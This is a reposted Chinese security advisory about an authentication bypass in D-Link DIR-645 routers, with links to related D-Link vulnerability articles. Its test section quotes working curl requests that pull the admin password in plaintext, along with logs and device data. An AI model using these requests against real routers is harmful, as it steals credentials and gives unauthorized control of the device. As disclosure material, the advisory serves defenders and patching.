安科网

D-Link DIR-645路由器远程身份验证绕过漏洞

lulinux

lulinux

2013-03-05

关注 关注

发布日期:2013-02-28
更新日期:2013-03-05

受影响系统:
D-Link DIR-645 1.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58231
 
D-Link DIR-645是无线路由器。
 
运行固件1.03之前版本的D-Link DIR-645,其Web界面上存在无需身份验证的网页,可被未经身份验证的远程攻击者利用泄露管理凭证,包括明文密码等敏感信息。
 
<*来源:Roberto Paleari ([email protected]
 
  链接:http://secunia.com/advisories/52432/
        http://archives.neohapsis.com/archives/bugtraq/2013-02/0151.html
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Roberto Paleari ([email protected])提供了如下测试方法:
 
获取管理员密码:
curl -d SERVICES=DEVICE.ACCOUNT http://<device ip>/getcfg.php
 
读取系统日志:
curl http://<device ip>/log_get.php
 
获取DDNS信息:
 curl -d act=getreport http://<device ip>/ddns_act.php

转储设备信息:
 curl http://<device ip>/DevInfo.php

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
D-Link
 ------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
http://www.dlink.com/

d-link 路由 curl

lulinux

lulinux

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

使用CSRF漏洞攻击D-link路由器全过程

本文的目的是展示CSRF漏洞的危害,以D-link的DIR-600路由器的CSRF漏洞为例。D-link的CSRF漏洞已经是公开的,本文将详细描述一下整个D-link CSRF漏洞的利用,如何通过CSRF漏洞实现远程管理访问D-link路由器。如果某些re

linux0 2014-04-24

多个D-Link 产品含跨站脚本攻击以及拒绝服务漏洞

受影响系统: D-Link DI-604 D-Link DI-524 D-Link DSL-G604T 描述: D-Link是国际著名网络设备和解决方案提供商,产品包括多种路由器设备。D-Link DI-524处理用户请求时存在多个漏洞,远程攻击者可能

ChinaWin 2008-10-07

D-Link数字签名证书遭窃,反倒成了黑客的“通行证”

数字签名的出现,曾大大加强了计算机应用使用的安全性,其复杂、独特的加密方式使得证书成为了软件的“防伪标志”,并迅速普及。日前,安全研究人员发现一款新的恶意软件,该软件使用了台湾某科技公司的合法数字证书签名,并将其伪造成了安全应用。此外,2017年CClea

大智若鲁在csdn 2018-07-13

多个D-Link产品缓冲区溢出漏洞(CVE-2014-7859)

多个D-Link产品缓冲区溢出漏洞发布日期:2015-05-28更新日期:2015-06-02受影响系统:。D-Link DNS DNS-345D-Link DNS DNS-327LD-Link DNS DNS-326D-Link DNS DNS-325D

grantlee 2015-06-02

D-Link和趋势网络路由器发现远程执行任意代码漏洞

惠普的 Zero Day Initiative 披露了友讯科技和趋势网络路由器的0day漏洞,该漏洞允许攻击者远程执行任意代码。漏洞是安全研究员Ricky "HeadlessZeke" Lawshae在2013年8月报告给ZDI,ZDI

yuanheiqng 2015-04-30

D-Link DIR-636L远程命令注入及身份验证绕过漏洞(CVE-2015-1187)

受影响系统:D-Link DIR-636L描述:BUGTRAQ ID: 72848CVE ID: CVE-2015-1187. D-Link DIR-636L是千兆无线云路由器。D-Link DIR-636L存在安全漏洞,可使同一网络上的攻击者在无身份验证

hebujiji 2015-03-08

小心路由器,国家互联网应急中心发出预警

以 D-LINK 部分路由器 产品为例,攻击者利用后门可取得路由器的完全控制权,CNVD 分析发现受该后门影响的 D-LINK 路由器在互联网上对应的 IP 地址 至少有 1.2 万个,影响大量用户。CNVD 及时向相关厂商通报威胁 情况,向公众发布预

gangmae 2015-05-28

D-Link DAP-1350 SQL注入漏洞

受影响系统:D-Link DAP-1350 <= 1.14描述:--------------------------------------------------------------------------------BUGTRAQ ID: 6

focuseven 2014-05-13

逆向工程友讯科技 (D-Link) 路由器固件后门

嵌入式设备安全研究员逆向工程出友讯科技路由器固件中的后门。D-Link的固件由其美国子公司Alpha Networks开发。安全研究人员发现,不需要任何验证,只需要浏览器用户代理字符串是“xmlset_roodkcableoj28840ybtide”就能访

dengshengli 2013-10-14

D-Link DSL2730U路由器Telnet Shell远程白名单绕过命令注入漏洞

受影响系统:D-Link DSL2730U描述:--------------------------------------------------------------------------------BUGTRAQ ID: 56914CVE ID:

Hansomewang 2012-12-14

D-Link DSL-2640B MAC地址身份验证绕过漏洞

受影响系统:D-Link DSL -2640B描述:--------------------------------------------------------------------------------BUGTRAQ ID: 52129. D-L

intbird 2012-02-25

D-Link 24口千兆交换机性能分析

24口千兆交换机有很多值得学习的地方,这里我们主要介绍关于D-Link 24口千兆交换机性能分析,DES-3226S是国际著名网络设备和解决方案提供商D-Link推出的一款二层堆叠24口千兆交换机精品。该产品融合了更多领先性能,实现了高效堆叠,能够最大化满

SmallCYL 2010-01-11
lulinux

lulinux

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号